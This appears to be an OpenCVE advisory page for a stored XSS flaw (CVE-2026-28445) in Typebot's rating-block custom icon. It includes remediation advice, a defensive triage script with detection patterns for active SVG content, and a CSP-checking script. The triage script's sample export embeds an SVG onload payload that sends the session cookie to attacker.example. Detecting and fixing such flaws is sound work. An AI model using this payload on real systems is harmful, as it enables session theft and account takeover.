Description
Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid's innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder's own origin (builder.typebot.io) under a CSP permitting 'unsafe-inline', a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder's authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0.
Published: 2026-05-22
Score: 8.7 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross‑site scripting flaw exists in the RatingButton component of Typebot’s embed package. The component renders the user‑controlled customIcon.svg field directly with Solid’s innerHTML directive, skipping the DOMPurify sanitization that other rendering paths in the codebase (for example StreamingBubble.tsx) already apply, and rating blocks are not flagged as isUnsafe by the import sanitizer. Because the builder preview renders bots inline on the builder’s own origin under a CSP that permits 'unsafe-inline', arbitrary HTML or JavaScript in the icon executes in the context of an authenticated builder user, outside the Web Worker sandbox that protects Script blocks, enabling session hijacking and privilege escalation. This is a classic CWE‑79 pattern: a trusted render path handed attacker‑controlled markup.
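As an added illustration (not Typebot's own code), the following Node/JavaScript triage script walks an exported typebot, finds rating blocks whose customIcon.svg carries active content, and disables those icons so the export can be imported while an upgrade is pending. The export layout (groups[].blocks[] with a type of "rating input" and options.customIcon.{isEnabled,svg}) and the group and block ids are assumptions, and the sample export is constructed for the example. The pattern list is a triage heuristic, not a sanitizer: entity encoding and similar tricks can evade it, so treat any custom icon from an untrusted source as unsafe and rely on the render‑path fix (DOMPurify, already a dependency) or the 3.16.0 upgrade.

```javascript
// Added example, not Typebot code. Export field names are assumptions.
// Markup that turns an inline SVG into script execution once it reaches innerHTML.
const ACTIVE_CONTENT_PATTERNS = [
  { name: "script element",             re: /<\s*script\b/i },
  { name: "event handler attribute",    re: /\bon[a-z]+\s*=/i },
  { name: "javascript: URL",            re: /javascript\s*:/i },
  { name: "foreignObject (embeds HTML)", re: /<\s*foreignObject\b/i },
  { name: "iframe/object/embed",        re: /<\s*(?:iframe|object|embed)\b/i },
];

function isRatingBlock(block) {
  // Assumed type string for rating input blocks in the export format.
  return typeof block?.type === "string" && /rating/i.test(block.type);
}

// One finding per rating block whose custom icon SVG matches at least one pattern.
function findUnsafeCustomIcons(typebotExport) {
  const findings = [];
  for (const group of typebotExport.groups ?? []) {
    for (const block of group.blocks ?? []) {
      if (!isRatingBlock(block)) continue;
      const svg = block.options?.customIcon?.svg;
      if (typeof svg !== "string" || svg.length === 0) continue;
      const reasons = ACTIVE_CONTENT_PATTERNS.filter((p) => p.re.test(svg)).map((p) => p.name);
      if (reasons.length > 0) findings.push({ groupId: group.id, blockId: block.id, reasons });
    }
  }
  return findings;
}

// Copy of the export with every flagged icon disabled and its markup removed,
// so the bot can be imported without the icon ever being rendered via innerHTML.
function neutralizeUnsafeCustomIcons(typebotExport) {
  const copy = JSON.parse(JSON.stringify(typebotExport));
  const flagged = new Set(findUnsafeCustomIcons(copy).map((f) => f.blockId));
  for (const group of copy.groups ?? []) {
    for (const block of group.blocks ?? []) {
      if (!flagged.has(block.id)) continue;
      block.options.customIcon.isEnabled = false;
      delete block.options.customIcon.svg;
    }
  }
  return copy;
}

// Constructed sample export: a benign star icon in g1, an icon carrying an
// onload handler that exfiltrates the builder session cookie in g2.
const SAMPLE_EXPORT = {
  version: "6",
  groups: [
    { id: "g1", blocks: [
      { id: "b1", type: "rating input", options: { buttonType: "Icons", length: 5,
        customIcon: { isEnabled: true,
          svg: '<svg viewBox="0 0 24 24"><path d="M12 2l3 7h7l-5.5 4 2 7-6.5-4.5L5.5 20l2-7L2 9h7z"/></svg>' } } },
      { id: "b2", type: "text", content: { richText: [] } },
    ] },
    { id: "g2", blocks: [
      { id: "b3", type: "rating input", options: { buttonType: "Icons", length: 5,
        customIcon: { isEnabled: true,
          svg: '<svg xmlns="http://www.w3.org/2000/svg" onload="fetch(\'https://attacker.example/?c=\'+document.cookie)"><circle r="4"/></svg>' } } },
    ] },
  ],
};

// Usage: report the flagged blocks, then confirm the neutralized copy is clean.
console.log(JSON.stringify(findUnsafeCustomIcons(SAMPLE_EXPORT), null, 2));
const cleaned = neutralizeUnsafeCustomIcons(SAMPLE_EXPORT);
console.log(findUnsafeCustomIcons(cleaned).length === 0 ? "neutralized export is clean" : "still unsafe");
```

Run it against a real export with `node triage.js` after replacing SAMPLE_EXPORT with the parsed file; anything it flags should be reviewed by hand, and anything it does not flag is still only as safe as the source it came from.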

Affected Systems

The vulnerability affects Typebot, the chatbot builder from typebot.io, specifically the RatingButton component of the embed package as rendered in the builder preview (builder.typebot.io). Versions 3.15.2 and all earlier releases are affected; the fix is included in version 3.16.0.

Risk and Exploitability

The CVSS 3.1 base score is 8.7 (High), vector AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N. No EPSS score is available and the CVE is not listed in CISA KEV; neither fact lowers the risk to an authenticated builder user. The attacker needs only low privileges (a collaborator account on the workspace, or getting a crafted typebot file imported), and the victim has to open the preview (UI:R); the injected script then runs with the victim’s builder session. Because the preview renders the icon outside the Web Worker sandbox that protects Script blocks, the impact covers confidentiality and integrity of the builder application (session hijacking, privilege escalation) but not availability (A:N). SSVC (version 2.0.3): Exploitation: poc, Automatable: no, Technical Impact: partial.

Generated by OpenCVE AI on May 22, 2026 at 17:20 UTC.

Remediation

Fixed upstream in Typebot version 3.16.0, per the advisory description. No separate workaround has been published by the vendor; the actions below are interim measures for deployments that cannot upgrade immediately.

OpenCVE Recommended Actions

  • Upgrade to Typebot version 3.16.0 or later where the vulnerability is fixed.
  • If an immediate upgrade is not possible, do not import typebots from untrusted sources, review rating blocks added by collaborators for a customIcon.svg, and disable custom icons on rating blocks (or remove the svg field) before the bot is previewed.
  • Re‑configure the Content Security Policy on the builder origin so that script‑src does not rely on 'unsafe‑inline' (use nonces or hashes instead). Note that CSP limits script execution but does not prevent injected markup, so also sanitize customIcon.svg on the render path (DOMPurify, already a dependency, with its SVG profile) or server‑side before it reaches the preview.
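To verify the CSP recommendation above, here is an added Node/JavaScript check (not Typebot code) that tells whether a Content‑Security‑Policy header value still allows inline script, which is what lets an injected SVG onload= attribute run in the preview. It follows the browser precedence rules: script‑src‑attr or script‑src‑elem governs first, then script‑src, then default‑src, and 'unsafe-inline' is ignored when the governing directive also lists a nonce or hash source or 'strict-dynamic'. The policies at the bottom are constructed for the example; the permissive one mirrors the situation the advisory describes. A passing policy stops script execution only: injected markup such as spoofed UI still lands on the page, so sanitizing the icon remains the real fix.

```javascript
// Added example, not Typebot code. Parses a CSP header value into directives.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // Browsers honour only the first occurrence of a directive.
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// kind: "attr" for inline event handlers such as onload=, "elem" for <script> elements.
function inlineScriptAllowed(header, kind = "attr") {
  const directives = parseCsp(header);
  const order = [`script-src-${kind}`, "script-src", "default-src"];
  const governing = order.find((d) => directives.has(d)) ?? null;
  if (governing === null) {
    return { directive: null, allowed: true,
             reason: "no script-src or default-src: inline script is unrestricted" };
  }
  const sources = directives.get(governing).map((s) => s.toLowerCase());
  const unsafeInline = sources.includes("'unsafe-inline'");
  const nonceOrHash = sources.some((s) => /^'(?:nonce-|sha(?:256|384|512)-)/.test(s));
  const strictDynamic = sources.includes("'strict-dynamic'");
  if (!unsafeInline) {
    return { directive: governing, allowed: false, reason: "'unsafe-inline' not present" };
  }
  if (nonceOrHash || strictDynamic) {
    return { directive: governing, allowed: false,
             reason: "'unsafe-inline' is ignored because a nonce, hash or 'strict-dynamic' source is also listed" };
  }
  return { directive: governing, allowed: true,
           reason: "'unsafe-inline' is effective: an injected onload= or <script> will run" };
}

// Constructed policies (not taken from the Typebot deployment).
const WEAK_CSP      = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example";
const NONCE_CSP     = "default-src 'self'; script-src 'self' 'nonce-r4nd0mV4lu3' 'unsafe-inline'";
const STRICT_CSP    = "default-src 'none'; script-src 'self'";
const ATTR_ONLY_CSP = "default-src 'none'; script-src 'self'; script-src-attr 'unsafe-inline'";

// Usage: evaluate each policy for inline event handlers, the vector that matters here.
for (const [label, policy] of Object.entries({ WEAK_CSP, NONCE_CSP, STRICT_CSP, ATTR_ONLY_CSP })) {
  const result = inlineScriptAllowed(policy, "attr");
  console.log(`${label}: inline handlers ${result.allowed ? "ALLOWED" : "blocked"} (${result.directive}: ${result.reason})`);
}
```

Feed it the header from `curl -sI https://<builder-host>/` (the Content‑Security‑Policy line) and check both kinds: a policy can nonce its own script elements while still leaving event handler attributes open through script‑src‑attr.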

Advisories

No advisories yet.

History

Fri, 22 May 2026 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 22 May 2026 16:30:00 +0000

Type Values Removed Values Added
Description Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid's innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder's own origin (builder.typebot.io) under a CSP permitting 'unsafe-inline', a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder's authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0.
Title Typebot: Stored XSS via Rating Block Custom Icon Bypasses isUnsafe Sandbox in Builder Preview
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-22T17:52:34.728Z

Reserved: 2026-02-27T15:54:05.140Z

Link: CVE-2026-28445

Vulnrichment

Updated: 2026-05-22T17:50:24.741Z

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-22T17:30:06Z

Weaknesses